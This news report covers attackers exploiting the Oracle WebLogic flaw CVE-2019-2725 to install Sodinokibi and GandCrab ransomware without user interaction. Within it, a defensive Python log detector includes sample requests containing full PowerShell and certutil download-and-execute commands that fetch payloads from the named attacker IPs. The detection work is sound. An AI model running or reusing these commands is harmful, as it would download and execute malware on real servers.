
Zero-day attackers deliver a double dose of ransomware – no click required



Screenshot of the ransomware warning.

Attackers have been actively exploiting a critical zero-day vulnerability in the widely used Oracle WebLogic server to install ransomware, with no clicking or other interaction required of end users, researchers from Cisco Talos said on Tuesday.

The vulnerability and working exploit code were first published in the China National Vulnerability Database (CNVD) two weeks ago, researchers from the security education group SANS ISC reported. The vulnerability is easy to exploit and lets attackers run code of their choice on affected servers. Because of their performance, bandwidth, and use in high-security cloud environments, these servers are considered high-value targets. The disclosure prompted Oracle to release an out-of-band patch on Friday (April 26, 2019).

Researchers with Cisco Talos said CVE-2019-2725, as the vulnerability has been indexed, has been actively exploited since at least April 21. Starting last Thursday, one day before Oracle fixed the zero-day, attackers used the exploit in a campaign to install a new ransomware strain called "Sodinokibi." Besides encrypting valuable data on infected computers, the malware attempts to delete shadow copy backups so that targets cannot easily recover the lost data. Oddly, about eight hours after infection, the attackers exploited the same vulnerability to install a different ransomware strain known as GandCrab.

No interaction required

"Previously, most variants of ransomware required some sort of user interaction. For example, a user opens an attachment to an email message, clicks a malicious link, or runs malware on the device," Talos researchers Pierre Cadieux, Colin Grady, Jaeson Schultz, and Matt Valites wrote on Tuesday. "In this case, the attackers simply used the Oracle WebLogic vulnerability, which allowed the affected server to download a copy of the ransomware from the attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79."

The vulnerability is easy to exploit because it requires only HTTP access to a vulnerable WebLogic server; its Common Vulnerability Scoring System severity is 9.8 out of a possible 10. Attackers send a POST request to a vulnerable server containing a PowerShell command that downloads and then executes a malicious file called radm.exe. Besides PowerShell, attackers are also using CVE-2019-2725 to invoke the certutil command-line utility. Other files downloaded and run include office.exe and untitled.exe.
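The exploitation pattern described above (a POST whose body carries a PowerShell or certutil download-and-execute command, fetching payloads from the two listed IP addresses) is easy to hunt for in web-tier request logs. The following detector is an added example written for this page; it is not code from Cisco Talos or Oracle. It assumes a simple request record with a method, a path and a body, and all of the sample requests, the placeholder URI path and the log layout are constructed here. It also decodes `powershell -EncodedCommand` arguments (base64 of UTF-16LE) so cradles hidden that way still match, a case the article does not cover.

```python
"""Flag WebLogic HTTP requests that match the exploitation pattern Talos describes.

Added example, not code from the Talos report or from Oracle. It scans request
records for a POST whose body carries a PowerShell or certutil download-and-
execute command, and for the attacker IPs and payload file names the report
lists. The record layout, URI path and sample requests are constructed.
"""
import base64
import re
from dataclasses import dataclass

# Indicators named in the report (the article defangs the IPs; re-fanged here for matching).
IOC_IPS = {"188.166.74.218", "45.55.211.79"}
IOC_FILES = {"radm.exe", "office.exe", "untitled.exe"}

# Verbs that fetch or run a payload from a PowerShell one-liner.
CRADLE_VERBS = re.compile(
    r"(?i)(downloadfile|downloadstring|invoke-webrequest|invoke-expression"
    r"|\biex\b|\biwr\b|start-process|\bwget\b|\bcurl\b)"
)
POWERSHELL = re.compile(r"(?i)\bpowershell(?:\.exe)?\b")
# powershell -EncodedCommand (and its short forms) takes base64 of a UTF-16LE script.
ENCODED_ARG = re.compile(
    r"(?i)powershell[^\n]*?\s-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})"
)
# certutil -urlcache ... -f <url> <file> is the download form the report mentions.
CERTUTIL_DOWNLOAD = re.compile(r"(?i)\bcertutil(?:\.exe)?\b[^\n]*?-urlcache[^\n]*?https?://")


@dataclass
class Request:
    method: str
    path: str
    body: str


def decode_encoded_powershell(body: str) -> list[str]:
    """Return the plaintext of every -EncodedCommand argument found in body."""
    scripts = []
    for b64 in ENCODED_ARG.findall(body):
        try:
            scripts.append(base64.b64decode(b64).decode("utf-16-le", errors="ignore"))
        except ValueError:  # not valid base64; the plain-text checks still apply
            continue
    return scripts


def scan_text(text: str, decoded: bool) -> set[str]:
    """Apply the indicator checks to one piece of text (raw body or a decoded script)."""
    hits = set()
    if CRADLE_VERBS.search(text) and (decoded or POWERSHELL.search(text)):
        hits.add("encoded powershell cradle" if decoded else "powershell download/execute cradle")
    if CERTUTIL_DOWNLOAD.search(text):
        hits.add("certutil -urlcache download")
    lowered = text.lower()
    hits.update(f"known attacker IP {ip}" for ip in IOC_IPS if ip in lowered)
    hits.update(f"known payload name {name}" for name in IOC_FILES if name in lowered)
    return hits


def analyze(req: Request) -> list[str]:
    """Reasons a request looks like the reported exploitation; empty list when clean."""
    if req.method.upper() != "POST":
        return []  # the report describes POST requests; other methods are out of scope here
    hits = scan_text(req.body, decoded=False)
    for script in decode_encoded_powershell(req.body):
        hits |= scan_text(script, decoded=True)
    return sorted(hits)


# Constructed sample traffic (the path is a placeholder, not the real vulnerable endpoint).
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://45.55.211.79/office.exe')".encode("utf-16-le")
).decode()
SAMPLE_REQUESTS = [
    Request("POST", "/soap/endpoint", "<soapenv:Envelope><soapenv:Body><ping/></soapenv:Body></soapenv:Envelope>"),
    Request("POST", "/soap/endpoint",
            "cmd /c powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
            "'http://188.166.74.218/radm.exe','C:\\Windows\\Temp\\radm.exe'); "
            "Start-Process 'C:\\Windows\\Temp\\radm.exe'\""),
    Request("POST", "/soap/endpoint",
            "cmd /c certutil -urlcache -split -f http://45.55.211.79/untitled.exe C:\\Windows\\Temp\\untitled.exe"),
    Request("POST", "/soap/endpoint", f"cmd /c powershell -nop -w hidden -enc {_ENCODED}"),
    Request("GET", "/console/login/LoginForm.jsp", ""),
]


def suspicious_indices(requests=SAMPLE_REQUESTS) -> list[int]:
    """Indexes of the requests that produced at least one finding."""
    return [i for i, req in enumerate(requests) if analyze(req)]


if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        print(i, req.method, req.path, analyze(req) or "clean")
```

The IP and file-name checks are the brittle part: they catch this campaign and nothing else, so the cradle and certutil patterns carry the durable signal. Matching on the request body requires a proxy or WAF that logs POST bodies; access logs that record only the request line will not show these indicators.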

The ransom note, pictured above and below, demands $2,500 worth of Bitcoin within two days in exchange for the decryption key that unlocks the encrypted data. After that period, the ransom doubles to $5,000. The attackers provide instructions on how cryptocurrency newcomers can set up a Bitcoin wallet and obtain the digital currency, and they recommend Blockchain.info for the purpose.

Ransom note image: Cisco Talos

The attacks are notable because they combine a severe zero-day with software that is widely used in cloud environments, a combination that means the attacks are likely to continue. Organizations that use WebLogic should make installing Friday's patch a top priority.

